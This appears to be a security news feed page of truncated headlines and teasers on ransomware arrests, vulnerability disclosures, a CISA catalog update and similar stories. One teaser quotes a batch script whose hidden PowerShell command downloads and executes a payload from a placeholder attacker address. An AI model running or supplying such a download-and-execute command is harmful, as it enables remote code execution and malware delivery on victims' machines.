CISA adds Arm Mali GPU Kernel Driver, PHP bugs to its Known Exploited Vulnerabilities catalog Pierluigi Paganini June 12, 2024…
The second Jira website I discovered was surprisingly harder to exploit. It didn’t give me the verbose errors like the…
Kaspersky researchers discovered widespread vulnerabilities in biometric terminals developed by ZKTeco, which are known to be deployed internationally. These flaws…
The Australian Digital Health Agency has claimed $1.04 million in service credits from Accenture, the outsourced operator of My Health…
Ukraine Police arrested a hacker who developed a crypter used by Conti and LockBit ransomware operation Pierluigi Paganini June 12,…
Defence is set to convert a secret advanced analytics project it has been researching into an actual operational capability. The…
The code we used for the batch script is below. @echo off powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))”…
In a major victory against ransomware operators, Ukrainian police have apprehended a Ukrainian national suspected of aiding the notorious ransomware…
The Black Basta ransomware gang may have exploited a Windows privilege escalation vulnerability as a zero-day before it was patched,…
Rocket maker SpaceX and its CEO Elon Musk were sued by eight engineers who say they were illegally fired for…
Amazon Web Services (AWS) has introduced FIDO2 passkeys as a new method for multi-factor authentication (MFA) to enhance account security…
US healthcare providers can ask UnitedHealth Group to notify people whose data was exposed during a hack on the company’s Change…











